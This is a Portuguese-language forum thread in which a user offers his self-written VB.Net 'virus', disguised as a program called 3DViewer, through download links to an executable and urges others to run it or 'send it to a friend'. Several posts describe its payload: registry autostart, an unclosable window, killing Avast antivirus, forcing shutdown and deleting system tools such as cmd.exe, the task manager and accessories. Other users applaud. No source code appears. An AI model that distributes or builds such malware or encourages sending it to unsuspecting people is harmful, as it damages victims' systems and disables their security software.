Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Meu primeiro Virus

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Desenvolvimento Meu primeiro Virus

    Bom galere, eu criei este tópico pra mostrar minha criação em VB.Net no qual dei o nome de 3DViewer, mas é um virus básico. Porém perigoso. Baixem e testem em uma maquina antiga (com XP) ou mandem pra um amigo

    (Fica bem claro que eu não apoio toda e qualquer prática mal intensionada)

    Download [ame="http://rapidshare.com/files/404796024/3DViewer.exe"]http://rapidshare.com/files/404796024/3DViewer.exe[/ame]

    Qualquer bug reportem que eu corrijo blz?

    Abraço galere

  • Font Size
    #2
    pqp kkk bomm(:

    Comment


    • Font Size
      #3
      Valeu #r4t0 abraçs lek

      Comment


      • Font Size
        #4
        O que ele faz?

        Gostou do meu Post? Agradeça!

        Comment


        • Font Size
          #5
          Vou combate-lo kkkk

          Comment


          • Font Size
            #6
            kkkkkk dahora.

            Comment


            • Font Size
              #7
              Poderia explicar o que ele faz e/ou mandar print?
              Nem todos tem máquina virtual......................
              (Piada de nerd) - Você comprou o cu dele?
              - Sim, comprei, era super duro e bem feito! Esse metalúrgico é de confiança!
              (Piada by Kaao; inventei ela do nada '-')

              NÃO RESPONDO PERGUNTAS POR PM!

              Se quiser uma ajuda minha, me indique o tópico com a sua duvida.

              Comment


              • Font Size
                #8
                Sim, ja irei explicar o que ele faz!

                Aguardem só uns minutos

                Comment


                • Font Size
                  #9
                  Bom, voltei e vou explicar o que o virus faz:

                  Ele quando executado cria uma chave de registro para se auto iniciar caso ocorra alguma tentativa de fechar o programa, ele não aparece na barra de tarefas, não tem opção de fechar, redimensionar e minimizar, ele fica sempre acima das outras tarefas, ele não pode ser movido, ele apaga os programas: paint, paciencia, campo minado, finaliza os processos do Avast 4 e 5, abre o iexplorer, abre o firefox (caso tenha instalado), abre o media player, abre o "shutdown" com 13 segundos e por fim exclui de vez o "cmd.exe". E ainda manda uma mensagem para o usuário.

                  E assim termina.. eu sei que ainda é pouco mas foi meu primeiro projeto em VB, isso já há uns 2 anos. Prometo postar "O Virus".

                  Enjoy

                  Comment


                  • Font Size
                    #10
                    Maaaaaaaas..que usa Linux ta na paz, já que o negócio é em .NET

                    Fail for Linusers...

                    Comment


                    • Font Size
                      #11
                      aushauhauh FAIL *MaLaGueTa Bem lembrado...

                      Bom, assim que eu conseguir abrir e fechar o programa sem tomar um tiro no pé...
                      Eu posto um print com ele aberto e depois de fechado.

                      Comment


                      • Font Size
                        #12
                        Gente, dei uma modificada no código do VIRUS, pois, achei alguns erros (básico mas erros) que podem falhar em tempo de execução. Mas contudo, o programa funfa legal, só um usuário mais avançado irá descobrir tais erros.

                        (POSTAREI O PROGRAMA para download assim que corrigir as falhas. Se algum de você baixar e encontrar falhas me reportem. Obrigado e desculpem o transtorno)

                        Comment


                        • Font Size
                          #13
                          [COLOR="Black"]Bom, como eu falei que ia mostrar um print do virus ja em execução.

                          OBS: ESSE PRINT JA É COM O PROGRAMA CORRIGIDO. NA QUAL IREI 'UPA-LO' PARA DOWNLOAD NOVAMENTE.

                          Na imagem abaixo vemos 2 formulários abertos, pois bem. o primeiro (com o fundo como um olho vermelho) é o principal e tem uns labels animados e 3 botões: "Cancel", "Exit" e "Close"



                          -Ao clicar em Cancel o virus irá deletar de vez o paint, paciencia, bloco de notas, calculadora, spider e pinball.

                          -Ao clicar em Exit o virus irá deletar de vez todas as proteções de tela do windows, irá parar (matar) o processo do avast 4 ou 5, irá abrir o media player, I Explorer, e o "clock.avi".

                          -Ao clicar em Close, será aberto um novo formulário todo em preto contendo um botão "Fechar" que realmente fecha tudo, MAS... Vão embora o dxdiag.exe (ferramenta de diagnst. do DirectX, gerenciador de tarefas e cmd.exe (eu sei que vai dar pau no XP, mas aí ja é tarde demais, perdeu playboy...) E assim, tudo se fecha e acaba

                          É pouca coisa que ele faz e nem é tão "ofensivo" assim, mas como ja disse, logo logo estarei postando "O virus".

                          Abraços e espero que tenham gostado

                          Comment


                          • Font Size
                            #14
                            moo massa elleee drx

                            Comment


                            • Font Size
                              #15
                              Postado Originalmente por SinistroMaster Ver Post
                              moo massa elleee drx

                              hehe, valeu!
                              Aqui está o link original para download

                              [ame]http://rapidshare.com/files/404966317/WindowsApplication.exe[/ame]

                              Comment

                              X
                              Working...
                              X